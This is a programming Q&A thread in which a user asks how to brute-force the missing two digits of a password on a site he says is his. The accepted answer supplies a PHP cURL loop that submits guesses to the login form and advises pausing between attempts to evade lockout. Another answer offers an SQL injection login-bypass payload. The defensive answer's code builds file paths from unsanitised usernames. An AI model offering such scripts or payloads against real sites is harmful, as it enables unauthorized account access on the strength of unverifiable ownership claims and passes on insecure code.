# Form loop with password cracking

Tags: php, html, forms, passwords

I have a somewhat hack-ish question and I'm intrigued as to how I would do the following (if even possible):

Basically, to give a bit of context, I had an account on a site a few years ago and had a username and password for the portal to log in and see all my information/transcript/etc. I haven't connected since I stopped using it a couple years ago by I wanted to view the information that I submitted. Problem is, I can no longer remember the password (to a certain degree). And if I go the 'forgot password' route, it's linked to a really old hotmail address which was deactivated a while back.

I'm aware that this will involve some sort of password crack and I don't want to talk about ways to screw people and gain access to their accounts but it's mine and I'm curious if this is possible.

Thing is, I have the username and I have the majority of the password, all except the final 2 numbers. I can't remember them. I know I added 2 digits at the end because I was forced to (between 10 and 99).

So say my username was 'johnsmith' and my password was 'eatdog##', is there a way to create a form and loop it over and over until the password is guessed correctly? I'm aware they might have some sort of protection against the amount of tries per 'whatever amount of time'.

Thanks.

Comment: What sort of login method do they use? Simple HTTP auth or something HTML form based?

Comment: Though any decent site will lock the account after 3 or 5 failed password attempts, requiring either a manual reset by an admin, or a timed release before it's accessible again

Comment: Just contact the owner of the site and ask for a password reset. If it's true that the account is yours you should have no problem proving it.

Comment: It is mine - I'm more interested by how it would be done rather than actually logging into my account. These types of concepts interest me for security reasons!

Comment: @mousesports: As they should. The only way to build a secure system is to know what vulnerabilities might exist. For example, this brute force attack is a perfect example of why a good login process must implement some form of lockout or delay.

Comment: Tell me your username and password base and I'll get in for you. I'll also need your credit card numbers to make the code work ;-)

Answer (score 2, accepted):

Considering you only need to iterate over < 100 different possibilities, this should be crackable.

View the HTML source of the page that contains the login form and see which page the form submits to. Lets assume it is `action.php`. You will see something like this in the HTML source:

`<form id="login" action="action.php" method="post">`

Use [cURL](http://php.net/manual/en/book.curl.php) to make a POST request to `action.php` with your username and password as POST parameters (including anything else the form is posting). Do this in a loop with the password changing at each iteration.

Your code should look something like this (in PHP)

```
$username = "johnsmith";
$pass_base = "eatdog";
$url = "the url the form submits to";
$failed = ""; //the response returned by the server when login fails

for ($i=10; $i < 100; $i++)
{
    $password = $pass_base . $i;

    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_POST,true);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);

    //set the POST parameters

    $data = curl_exec($ch);
    curl_close($ch);    

    if ($data != $failed)   //analyze the returned data
    {
        echo $password;     //this is your password
        break;
    }   
}
```

The above code is a PHP script. It WILL NOT run as is. I've only provided the meat of the script. You might have to do some basic initialization - hopefully you're somewhat familiar with PHP.

You can run it from your localhost (install [WAMP](http://www.wampserver.com/en/)). I'd estimate it shouldn't take more than 5 min to run through all the passwords.

This would only work if the login process isn't specifically designed to stop brute force attacks. If it locks you out for x min after y unsuccessful logins, you'd have to sleep the PHP script after every `y-1` attempts for sometime so as not to trigger the lockout.

If it starts asking for captcha, the above script won't work.

Comment: xbonez, thanks. I started to do this before (sort of). I grabbed the HTML form, took the action and submitted to it. Would you mind elaborating on using cURL and the method that you would use to do it?

Comment: Pretty sure you meant `if ($data != "*un*successful login")`

Comment: Thanks @xbonez. I'm not that familiar with PHP unfortunately. It's pretty much for learning purposes (and seeing what's possible) but I do have MAMP running, I took the HTML from the log in page, pasted it into a new PHP file. Kind of stuck now but I'll eventually get it, maybe :p

Comment: I'm kind of lost with the combination between cURL (never used it) and the form. What do you mean by 'set the POST parameters'. What a newb :(

Comment: I think I figured out how to do the rest but it doesn't seem to be echoing the password. I added a $fields array with the $key => $value pair from the original form (the POST parameters) and then built a $fields_string variable and added curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string). I then re-initalized the $fields_string = '' at the end of the loop so it doesn't concatenate the previously looped string to the next iteration.

Maybe my password wasn't what I thought it was :p

Answer (score 0):

If they didn't add mysql_real_escape_string then you can force your way in by entering your username and for your password enter a blank space followed by

" OR 1=1

The double quotes will set the password slot equal to nothing. The or will force the mysql query to check the second statement should password not return the proper value, it won't.

And thus 1 always equals 1 and you will be allowed to log-in.

You'd think most websites would use the simple function so it might not work but it's worth one login attempt.

Comment: But essentially performing a DoS attack, albeit a small one, is better? A way in is a way in and being capable of looking at all aspects will allow you to see "the" way in. But I understand. I study these for the fact of protecting myself but I also follow anonymous on twitter and read their pastebins. Interesting stuff.

Comment: Well no. I guess it's not 'better'. That's good to know (for Anonymous). Didn't know they posted on pastebin :>

Comment: @HenryGuy: I don't see how your SQL injection would work. The user passwords are hashed and stored in a db, so when you enter a password in the form field, the contents are hashed before being dispatched to the database. Essentially the DB won't receive `SELECT * ... WHERE password = "" OR 1 =1` but instead `SELECT * ... WHERE password = "md5(" OR 1=1)`

Answer (score -1):

If you were the owner of the site and you wanted to do something about this, a really rough way to defend against this would be something like (using PHP):

```
$count = file_get_contents('/some/writable/dir/'$_POST['username']);
if (!$count) {
    $count = 0;
}
if ($count > 5) {
    print "Naughty!"; // or add a CAPTCHA or something
    exit;
}
$success = checkLogin($_POST['username'], $_POST['password']);
if ($success) {
    // set cookies, send them away with header('location:blah.php'); exit
} else {
    $count ++;
    file_put_contents('/some/writable/dir/'$_POST['username'], $count);
}
```

And set a cron job to delete all the files in /some/writable/dir/ every five minutes or so.

Like I said, it's properly rough, but it should give you an idea of how to start adding some armour to your site.